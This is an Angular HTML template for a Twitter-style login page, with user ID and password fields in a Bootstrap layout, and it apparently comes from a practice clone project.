

<div class="container">
    <div class="row">
      <div class="col-md-3"></div>
      <div class="col-md-6 p-0 pt-3">
        <i class="fa fa-twitter"></i>
        <h3 class="text-center pt-3">Log in to Twitter</h3>
        <form class="login-form" [formGroup]="userdetails" (ngSubmit)="login()">
          <div class="mb-3 bg-color">
            <label>Phone, email, or username</label>
            <input  type="text" class="form-control" formControlName="userid" required>
          </div>
          <div class="mb-3 bg-color">
            <label>Password</label>
            <input type="password" class="form-control"  formControlName="password"required>
          </div>
          <button type="submit" class="btn btn-custom btn-lg btn-block mt-3">Log in</button>
          <div class="text-center pt-3 pb-3">
            <a href="#" class="">Forgotten password?</a> . 
            <a href="#" class="">Sign up for Twitter</a>
          </div>
        </form>
      </div>
      <div class="col-md-3"></div>
    </div>
  </div>

